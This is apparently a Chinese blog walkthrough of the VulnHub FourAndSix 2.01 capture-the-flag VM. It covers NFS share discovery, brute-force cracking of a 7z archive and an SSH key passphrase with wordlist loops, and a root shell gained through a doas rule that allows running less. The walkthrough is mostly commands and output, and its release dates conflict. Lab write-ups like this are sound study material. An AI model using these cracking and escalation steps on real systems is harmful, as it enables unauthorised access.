本文主要记录对 FourAndSix 2.01 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com
博客集:面向 CTF 的 OSCP 破解系列
下载链接:FourAndSix 2.01
2019年4月13日19:19:03 【原创】
Name: FourAndSix: 2.01
名字:FourAndSix: 2.01
Date release: 28 Oct 2018
发布日期:2019-8-28
Description: Task is to become root and read /root/flag.txt.
描述:获取 root 权限并读取 /root/flag.txt 文件内容
开始不知道IP,使用 netdicover 进行IP发现
root@kali:~# netdiscover -r 10.10.10.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 4 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.10.10.1 00:50:56:c0:00:08 2 120 VMware, Inc.
10.10.10.2 00:50:56:fb:16:b2 1 60 VMware, Inc.
10.10.10.76 00:0c:29:62:56:41 1 60 VMware, Inc.
10.10.10.254 00:50:56:e0:63:df 1 60 VMware, Inc.
发现IP为 10.10.10.76 ,下面使用 nmap 进行端口探测
-Pn 使用无 ping扫描,疑问有的主机禁用了ICMP
-p- 全端口扫描,类似于 -p 1-65535
root@kali:~# nmap -Pn -p- 10.10.10.76
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 01:28 EDT
Nmap scan report for 10.10.10.76
Host is up (0.00054s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
820/tcp open unknown
2049/tcp open nfs
MAC Address: 00:0C:29:62:56:41 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 707.82 seconds
惊奇的发现开放了 nfs 服务。NSF代表网络文件系统协议。
# 可能需要安装 apt-get install nfs-common
root@kali:~# showmount -e 10.10.10.76
Export list for 10.10.10.76:
/home/user/storage (everyone)
发现有一个目录(/home/user/storage)是可以任一用户访问的,挂载到本机
root@kali:~# mount -t nfs 10.10.10.76:/home/user/storage ctf-nfs/
root@kali:~# cd ctf-nfs/
root@kali:~/ctf-nfs# ls
backup.7z
root@kali:~/ctf-nfs# 7z e backup.7z
Enter password (will not be echoed):
# 解压的过程中发现需要输入密码
下面就需要找到解压缩密码
# 方法一
root@kali:~/ctf-nfs# rarcrack --thread 4 --type 7z backup.7z
# 方法二:
路径:https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/7z-crack.sh
root@kali:~/ctf-nfs# cat 7z-crack.sh
while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$line;break;fi;done
root@kali:~/ctf-nfs# chmod 777 7z-crack.sh
root@kali:~/ctf-nfs# ./7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt
# 方法三
在线破解 https://www.lostmypass.com/
#方法四
路径 https://github.com/koboi137/john/7z2john.pl
root@kali:~/ctf-nfs# git clone https://github.com/koboi137/john
root@kali:~/ctf-nfs/john-master# ./7z2john.pl ../backup.7z > ../backup.7z.hash:/
root@kali:~/ctf-nfs/john-master# john -w:/usr/share/wordlists/rockyou.txt ../backup.7z.hash
无论如何,最后得出的结果是 密码 chocolate
root@kali:~/ctf-nfs# 7z e backup.7z
root@kali:~/ctf-nfs#ssh-keygen -l -f id_rsa.pub
2048 SHA256:BPl29YrxUBdBmLaG6K58UGlR0wruEBQE8vGOtrbXl8Y user@fourandsix2 (RSA)
用于SSH访问的RSA密钥对。使用密钥登录,提示仍然需要密码。破解另一个密码
root@kali:~/ctf-nfs# ssh -i id_rsa [email protected]
# 破解另一个密码
root@kali:~/ctf-nfs# cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen –c –C "user@forandsix" –P $pass –f id_rsa &>/dev/null; then echo $pass; break; fi; done
密码为 12345678
root@kali:~/ctf-nfs# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 12345678
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)
提权
fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$
发现一个名为 /usr/bin/doas 的程序,通常此程序作用类似于 sudo,从这里下手
fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
执行命令提权
fourandsix2$ doas /usr/bin/less /var/log/authlog
按 v 跳转到 vi 模式,之后输入 :!sh 跳转到一个全新的shell环境
获取到flag
fourandsix2# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
fourandsix2# cat /root/flag.txt
Nice you hacked all the passwords!
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42
fourandsix2#